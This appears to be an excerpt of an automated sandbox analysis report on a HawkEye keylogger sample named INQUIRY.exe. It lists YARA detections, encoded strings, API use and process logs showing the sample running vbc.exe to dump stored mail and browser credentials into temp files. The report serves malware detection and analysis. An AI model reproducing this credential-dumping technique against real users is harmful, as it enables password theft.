                    Source: 33.2.INQUIRY.exe.2210000.1.unpack, type: UNPACKEDPE, Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 33.2.INQUIRY.exe.2210000.1.unpack, type: UNPACKEDPE, Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 27.2.INQUIRY.exe.2640000.3.unpack, type: UNPACKEDPE, Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 27.2.INQUIRY.exe.2640000.3.unpack, type: UNPACKEDPE, Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 1.2.INQUIRY.exe.21e0000.1.raw.unpack, type: UNPACKEDPE, Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 1.2.INQUIRY.exe.21e0000.1.raw.unpack, type: UNPACKEDPE, Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 1.2.INQUIRY.exe.2300000.3.unpack, type: UNPACKEDPE, Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 1.2.INQUIRY.exe.2300000.3.unpack, type: UNPACKEDPE, Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 33.2.INQUIRY.exe.2380000.3.unpack, type: UNPACKEDPE, Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 33.2.INQUIRY.exe.2380000.3.unpack, type: UNPACKEDPE, Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 16.2.INQUIRY.exe.2490000.3.unpack, type: UNPACKEDPE, Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 16.2.INQUIRY.exe.2490000.3.unpack, type: UNPACKEDPE, Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 0.2.INQUIRY.exe.25f0000.2.unpack, type: UNPACKEDPE, Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 0.2.INQUIRY.exe.25f0000.2.unpack, type: UNPACKEDPE, Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 28.2.INQUIRY.exe.7a0000.1.unpack, type: UNPACKEDPE, Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 28.2.INQUIRY.exe.7a0000.1.unpack, type: UNPACKEDPE, Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 32.2.INQUIRY.exe.2630000.2.unpack, type: UNPACKEDPE, Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 32.2.INQUIRY.exe.2630000.2.unpack, type: UNPACKEDPE, Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 16.2.INQUIRY.exe.22e0000.1.raw.unpack, type: UNPACKEDPE, Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 16.2.INQUIRY.exe.22e0000.1.raw.unpack, type: UNPACKEDPE, Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 27.2.INQUIRY.exe.25e0000.2.unpack, type: UNPACKEDPE, Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 27.2.INQUIRY.exe.25e0000.2.unpack, type: UNPACKEDPE, Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 33.2.INQUIRY.exe.22f0000.2.unpack, type: UNPACKEDPE, Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 33.2.INQUIRY.exe.22f0000.2.unpack, type: UNPACKEDPE, Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 16.2.INQUIRY.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 16.2.INQUIRY.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 28.2.INQUIRY.exe.2240000.2.unpack, type: UNPACKEDPE, Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 28.2.INQUIRY.exe.2240000.2.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 28.2.INQUIRY.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 28.2.INQUIRY.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 13.2.INQUIRY.exe.2660000.3.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 13.2.INQUIRY.exe.2660000.3.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 1.2.INQUIRY.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 1.2.INQUIRY.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 0.2.INQUIRY.exe.2640000.3.unpack, Form1.cs, Cryptographic APIs: 'CreateDecryptor', 'TransformFinalBlock'
                    Source: 0.2.INQUIRY.exe.2640000.3.unpack, Form1.cs, Cryptographic APIs: 'CreateDecryptor'
                    Source: 1.2.INQUIRY.exe.2270000.2.unpack, Form1.cs, Cryptographic APIs: 'CreateDecryptor', 'TransformFinalBlock'
                    Source: 1.2.INQUIRY.exe.2270000.2.unpack, Form1.cs, Cryptographic APIs: 'CreateDecryptor'
                    Source: 0.2.INQUIRY.exe.2640000.3.unpack, Form1.cs, Base64 encoded string: 'V9z0MtEfK2EI50ruA/sX5435SES1SZRTR7cTqTnmp3AxYZifJxwgy7QFTKhlmSGx', 'xs2M8HBBKsXOBp/txdt4WH36BZtFcWtpatuDMJkzHUo9RE6HRhBOXZQPez9CEdmS', 'PN4TW3peZ3UeXi7asDB56E4dMEf6JrdkxXNUlrUjLlWcjHK1wZ5CpLZZKB/ocuFWy9Kw0Q8tIc1Qv7OEgqzD+w=='
                    Source: 1.2.INQUIRY.exe.2270000.2.unpack, Form1.cs, Base64 encoded string: 'V9z0MtEfK2EI50ruA/sX5435SES1SZRTR7cTqTnmp3AxYZifJxwgy7QFTKhlmSGx', 'xs2M8HBBKsXOBp/txdt4WH36BZtFcWtpatuDMJkzHUo9RE6HRhBOXZQPez9CEdmS', 'PN4TW3peZ3UeXi7asDB56E4dMEf6JrdkxXNUlrUjLlWcjHK1wZ5CpLZZKB/ocuFWy9Kw0Q8tIc1Qv7OEgqzD+w=='
                    Source: 1.2.INQUIRY.exe.2300000.3.unpack, Form1.cs, Base64 encoded string: 'V9z0MtEfK2EI50ruA/sX5435SES1SZRTR7cTqTnmp3AxYZifJxwgy7QFTKhlmSGx', 'xs2M8HBBKsXOBp/txdt4WH36BZtFcWtpatuDMJkzHUo9RE6HRhBOXZQPez9CEdmS', 'PN4TW3peZ3UeXi7asDB56E4dMEf6JrdkxXNUlrUjLlWcjHK1wZ5CpLZZKB/ocuFWy9Kw0Q8tIc1Qv7OEgqzD+w=='
                    Source: 1.2.INQUIRY.exe.400000.0.unpack, Form1.cs, Base64 encoded string: 'V9z0MtEfK2EI50ruA/sX5435SES1SZRTR7cTqTnmp3AxYZifJxwgy7QFTKhlmSGx', 'xs2M8HBBKsXOBp/txdt4WH36BZtFcWtpatuDMJkzHUo9RE6HRhBOXZQPez9CEdmS', 'PN4TW3peZ3UeXi7asDB56E4dMEf6JrdkxXNUlrUjLlWcjHK1wZ5CpLZZKB/ocuFWy9Kw0Q8tIc1Qv7OEgqzD+w=='
                    Source: 13.2.INQUIRY.exe.2660000.3.unpack, Form1.cs, Base64 encoded string: 'V9z0MtEfK2EI50ruA/sX5435SES1SZRTR7cTqTnmp3AxYZifJxwgy7QFTKhlmSGx', 'xs2M8HBBKsXOBp/txdt4WH36BZtFcWtpatuDMJkzHUo9RE6HRhBOXZQPez9CEdmS', 'PN4TW3peZ3UeXi7asDB56E4dMEf6JrdkxXNUlrUjLlWcjHK1wZ5CpLZZKB/ocuFWy9Kw0Q8tIc1Qv7OEgqzD+w=='
                    Source: 16.2.INQUIRY.exe.2370000.2.unpack, Form1.cs, Base64 encoded string: 'V9z0MtEfK2EI50ruA/sX5435SES1SZRTR7cTqTnmp3AxYZifJxwgy7QFTKhlmSGx', 'xs2M8HBBKsXOBp/txdt4WH36BZtFcWtpatuDMJkzHUo9RE6HRhBOXZQPez9CEdmS', 'PN4TW3peZ3UeXi7asDB56E4dMEf6JrdkxXNUlrUjLlWcjHK1wZ5CpLZZKB/ocuFWy9Kw0Q8tIc1Qv7OEgqzD+w=='
                    Source: 16.2.INQUIRY.exe.2490000.3.unpack, Form1.cs, Base64 encoded string: 'V9z0MtEfK2EI50ruA/sX5435SES1SZRTR7cTqTnmp3AxYZifJxwgy7QFTKhlmSGx', 'xs2M8HBBKsXOBp/txdt4WH36BZtFcWtpatuDMJkzHUo9RE6HRhBOXZQPez9CEdmS', 'PN4TW3peZ3UeXi7asDB56E4dMEf6JrdkxXNUlrUjLlWcjHK1wZ5CpLZZKB/ocuFWy9Kw0Q8tIc1Qv7OEgqzD+w=='
                    Source: 16.2.INQUIRY.exe.400000.0.unpack, Form1.cs, Base64 encoded string: 'V9z0MtEfK2EI50ruA/sX5435SES1SZRTR7cTqTnmp3AxYZifJxwgy7QFTKhlmSGx', 'xs2M8HBBKsXOBp/txdt4WH36BZtFcWtpatuDMJkzHUo9RE6HRhBOXZQPez9CEdmS', 'PN4TW3peZ3UeXi7asDB56E4dMEf6JrdkxXNUlrUjLlWcjHK1wZ5CpLZZKB/ocuFWy9Kw0Q8tIc1Qv7OEgqzD+w=='
                    Source: 27.2.INQUIRY.exe.2640000.3.unpack, Form1.cs, Base64 encoded string: 'V9z0MtEfK2EI50ruA/sX5435SES1SZRTR7cTqTnmp3AxYZifJxwgy7QFTKhlmSGx', 'xs2M8HBBKsXOBp/txdt4WH36BZtFcWtpatuDMJkzHUo9RE6HRhBOXZQPez9CEdmS', 'PN4TW3peZ3UeXi7asDB56E4dMEf6JrdkxXNUlrUjLlWcjHK1wZ5CpLZZKB/ocuFWy9Kw0Q8tIc1Qv7OEgqzD+w=='
                    Source: 28.2.INQUIRY.exe.22f0000.3.unpack, Form1.cs, Base64 encoded string: 'V9z0MtEfK2EI50ruA/sX5435SES1SZRTR7cTqTnmp3AxYZifJxwgy7QFTKhlmSGx', 'xs2M8HBBKsXOBp/txdt4WH36BZtFcWtpatuDMJkzHUo9RE6HRhBOXZQPez9CEdmS', 'PN4TW3peZ3UeXi7asDB56E4dMEf6JrdkxXNUlrUjLlWcjHK1wZ5CpLZZKB/ocuFWy9Kw0Q8tIc1Qv7OEgqzD+w=='
                    Source: 28.2.INQUIRY.exe.400000.0.unpack, Form1.cs, Base64 encoded string: 'V9z0MtEfK2EI50ruA/sX5435SES1SZRTR7cTqTnmp3AxYZifJxwgy7QFTKhlmSGx', 'xs2M8HBBKsXOBp/txdt4WH36BZtFcWtpatuDMJkzHUo9RE6HRhBOXZQPez9CEdmS', 'PN4TW3peZ3UeXi7asDB56E4dMEf6JrdkxXNUlrUjLlWcjHK1wZ5CpLZZKB/ocuFWy9Kw0Q8tIc1Qv7OEgqzD+w=='
                    Source: 28.2.INQUIRY.exe.2240000.2.unpack, Form1.cs, Base64 encoded string: 'V9z0MtEfK2EI50ruA/sX5435SES1SZRTR7cTqTnmp3AxYZifJxwgy7QFTKhlmSGx', 'xs2M8HBBKsXOBp/txdt4WH36BZtFcWtpatuDMJkzHUo9RE6HRhBOXZQPez9CEdmS', 'PN4TW3peZ3UeXi7asDB56E4dMEf6JrdkxXNUlrUjLlWcjHK1wZ5CpLZZKB/ocuFWy9Kw0Q8tIc1Qv7OEgqzD+w=='
                    Source: 13.2.INQUIRY.exe.2660000.3.unpack, Form1.cs, Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
                    Source: 0.2.INQUIRY.exe.2640000.3.unpack, Form1.cs, Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
                    Source: 1.2.INQUIRY.exe.2300000.3.unpack, Form1.cs, Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
                    Source: 28.2.INQUIRY.exe.2240000.2.unpack, Form1.cs, Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
                    Source: 1.2.INQUIRY.exe.400000.0.unpack, Form1.cs, Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
                    Source: 28.2.INQUIRY.exe.22f0000.3.unpack, Form1.cs, Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
                    Source: 28.2.INQUIRY.exe.400000.0.unpack, Form1.cs, Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
                    Source: 1.2.INQUIRY.exe.2270000.2.unpack, Form1.cs, Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
                    Source: 16.2.INQUIRY.exe.2370000.2.unpack, Form1.cs, Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
                    Source: 16.2.INQUIRY.exe.400000.0.unpack, Form1.cs, Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
                    Source: 27.2.INQUIRY.exe.2640000.3.unpack, Form1.cs, Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
                    Source: 16.2.INQUIRY.exe.2490000.3.unpack, Form1.cs, Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
                    Source: classification engine, Classification label: mal100.phis.troj.spyw.evad.winEXE@46/34@17/4
                    Source: C:\Users\user\Desktop\INQUIRY.exe, Code function: 0_2_00420A80 GetLastError,FormatMessageA,
                    Source: C:\Users\user\Desktop\INQUIRY.exe, Code function: 0_2_00408B82 GetDiskFreeSpaceA,
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe, Code function: 6_2_00411196 CreateToolhelp32Snapshot,memset,Process32FirstW,OpenProcess,memset,GetModuleHandleW,GetProcAddress,QueryFullProcessImageNameW,QueryFullProcessImageNameW,CloseHandle,free,Process32NextW,CloseHandle,
                    Source: C:\Users\user\Desktop\INQUIRY.exe, Code function: 0_2_00417214 FindResourceA,LoadResource,SizeofResource,LockResource,
                    Source: C:\Users\user\Desktop\INQUIRY.exe, File created: C:\Users\user\AppData\Roaming\pid.txt
                    Source: C:\Users\user\Desktop\INQUIRY.exe, Mutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
                    Source: C:\Windows\SysWOW64\WerFault.exe, Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6808
                    Source: C:\Windows\SysWOW64\WerFault.exe, Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess5896
                    Source: C:\Windows\SysWOW64\WerFault.exe, Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess1364
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe, File created: C:\ProgramData\Microsoft\Windows\WER\Temp\WEREF38.tmp
                    Source: C:\Users\user\Desktop\INQUIRY.exe, Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                    Source: C:\Users\user\Desktop\INQUIRY.exe, Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\9603718106bd57ecfbb18fefd769cab4\mscorlib.ni.dll
                    Source: C:\Users\user\Desktop\INQUIRY.exe, Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
                    Source: C:\Users\user\Desktop\INQUIRY.exe, Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
                    Source: C:\Windows\SysWOW64\WerFault.exe, Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\9603718106bd57ecfbb18fefd769cab4\mscorlib.ni.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe, System information queried: HandleInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exe, WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Users\user\Desktop\INQUIRY.exe, Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                    Source: C:\Users\user\Desktop\INQUIRY.exe, File read: C:\Windows\System32\drivers\etc\hosts
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe, File read: C:\Windows\System32\drivers\etc\hosts
                    Source: C:\Windows\SysWOW64\WerFault.exe, File read: C:\Windows\System32\drivers\etc\hosts
                    Source: INQUIRY.exe, vbc.exe, INQUIRY.exe, 0000000D.00000002.756918468.0000000002662000.00000040.00000001.sdmp, INQUIRY.exe, 00000010.00000002.825855451.00000000022E0000.00000004.00000001.sdmp, vbc.exe, 00000014.00000002.774520700.0000000000400000.00000040.00000001.sdmp Binary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
                    Source: INQUIRY.exe, vbc.exe, INQUIRY.exe, 0000000D.00000002.756918468.0000000002662000.00000040.00000001.sdmp, INQUIRY.exe, 00000010.00000002.825855451.00000000022E0000.00000004.00000001.sdmp, vbc.exe, 00000014.00000002.774520700.0000000000400000.00000040.00000001.sdmp Binary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
                    Source: INQUIRY.exe, 00000000.00000002.656291540.0000000002642000.00000040.00000001.sdmp, INQUIRY.exe, 00000001.00000002.741822453.0000000003A41000.00000004.00000001.sdmp, vbc.exe, 00000006.00000002.695692485.0000000000400000.00000040.00000001.sdmp, INQUIRY.exe, 0000000D.00000002.756918468.0000000002662000.00000040.00000001.sdmp, INQUIRY.exe, 00000010.00000002.825855451.00000000022E0000.00000004.00000001.sdmp, vbc.exe, 00000014.00000002.774520700.0000000000400000.00000040.00000001.sdmp Binary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
                    Source: INQUIRY.exe, vbc.exe, INQUIRY.exe, 0000000D.00000002.756918468.0000000002662000.00000040.00000001.sdmp, INQUIRY.exe, 00000010.00000002.825855451.00000000022E0000.00000004.00000001.sdmp, vbc.exe, 00000014.00000002.774520700.0000000000400000.00000040.00000001.sdmp Binary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
                    Source: INQUIRY.exe, vbc.exe, INQUIRY.exe, 0000000D.00000002.756918468.0000000002662000.00000040.00000001.sdmp, INQUIRY.exe, 00000010.00000002.825855451.00000000022E0000.00000004.00000001.sdmp, vbc.exe, 00000014.00000002.774520700.0000000000400000.00000040.00000001.sdmp Binary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
                    Source: INQUIRY.exe, vbc.exe, INQUIRY.exe, 0000000D.00000002.756918468.0000000002662000.00000040.00000001.sdmp, INQUIRY.exe, 00000010.00000002.825855451.00000000022E0000.00000004.00000001.sdmp, vbc.exe, 00000014.00000002.774520700.0000000000400000.00000040.00000001.sdmp Binary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
                    Source: INQUIRY.exe, vbc.exe, INQUIRY.exe, 0000000D.00000002.756918468.0000000002662000.00000040.00000001.sdmp, INQUIRY.exe, 00000010.00000002.825855451.00000000022E0000.00000004.00000001.sdmp, vbc.exe, 00000014.00000002.774520700.0000000000400000.00000040.00000001.sdmp Binary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
                    Source: INQUIRY.exe Virustotal: Detection: 43%
                    Source: INQUIRY.exe ReversingLabs: Detection: 41%
                    Source: C:\Users\user\Desktop\INQUIRY.exe File read: C:\Users\user\Desktop\INQUIRY.exe
                    Source: unknown Process created: C:\Users\user\Desktop\INQUIRY.exe 'C:\Users\user\Desktop\INQUIRY.exe'
                    Source: unknown Process created: C:\Users\user\Desktop\INQUIRY.exe 'C:\Users\user\Desktop\INQUIRY.exe' 2 5896 5358953
                    Source: unknown Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe dw20.exe -x -s 2308
                    Source: unknown Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holdermail.txt'
                    Source: unknown Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holderwb.txt'
                    Source: unknown Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5896 -s 2216
                    Source: unknown Process created: C:\Users\user\Desktop\INQUIRY.exe C:\Users\user\Desktop\INQUIRY.exe
                    Source: unknown Process created: C:\Users\user\Desktop\INQUIRY.exe 'C:\Users\user\Desktop\INQUIRY.exe' 2 6808 5404546
                    Source: unknown Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe dw20.exe -x -s 2272
                    Source: unknown Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holdermail.txt'
                    Source: unknown Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holderwb.txt'
                    Source: unknown Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6808 -s 2324
                    Source: unknown Process created: C:\Users\user\Desktop\INQUIRY.exe C:\Users\user\Desktop\INQUIRY.exe
                    Source: unknown Process created: C:\Users\user\Desktop\INQUIRY.exe 'C:\Users\user\Desktop\INQUIRY.exe' 2 240 5445406
                    Source: unknown Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe dw20.exe -x -s 2100
                    Source: unknown Process created: C:\Users\user\Desktop\INQUIRY.exe C:\Users\user\Desktop\INQUIRY.exe
                    Source: unknown Process created: C:\Users\user\Desktop\INQUIRY.exe 'C:\Users\user\Desktop\INQUIRY.exe' 2 1364 5460187
                    Source: unknown Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe dw20.exe -x -s 2284
                    Source: unknown Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holdermail.txt'
                    Source: unknown Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holderwb.txt'
                    Source: unknown Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 1364 -s 2096
                    Source: C:\Users\user\Desktop\INQUIRY.exe Process created: C:\Users\user\Desktop\INQUIRY.exe 'C:\Users\user\Desktop\INQUIRY.exe'
                    Source: C:\Users\user\Desktop\INQUIRY.exe Process created: C:\Users\user\Desktop\INQUIRY.exe 'C:\Users\user\Desktop\INQUIRY.exe' 2 5896 5358953
                    Source: C:\Users\user\Desktop\INQUIRY.exe Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe dw20.exe -x -s 2308
                    Source: C:\Users\user\Desktop\INQUIRY.exe Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holdermail.txt'
                    Source: C:\Users\user\Desktop\INQUIRY.exe Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holderwb.txt'
                    Source: C:\Users\user\Desktop\INQUIRY.exe Process created: C:\Users\user\Desktop\INQUIRY.exe C:\Users\user\Desktop\INQUIRY.exe
                    Source: C:\Users\user\Desktop\INQUIRY.exe Process created: C:\Users\user\Desktop\INQUIRY.exe 'C:\Users\user\Desktop\INQUIRY.exe' 2 6808 5404546
                    Source: C:\Users\user\Desktop\INQUIRY.exe Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe dw20.exe -x -s 2272
                    Source: C:\Users\user\Desktop\INQUIRY.exe Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holdermail.txt'
                    Source: C:\Users\user\Desktop\INQUIRY.exe Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holderwb.txt'
                    Source: C:\Users\user\Desktop\INQUIRY.exe Process created: C:\Users\user\Desktop\INQUIRY.exe C:\Users\user\Desktop\INQUIRY.exe
                    Source: C:\Users\user\Desktop\INQUIRY.exe Process created: C:\Users\user\Desktop\INQUIRY.exe 'C:\Users\user\Desktop\INQUIRY.exe' 2 240 5445406
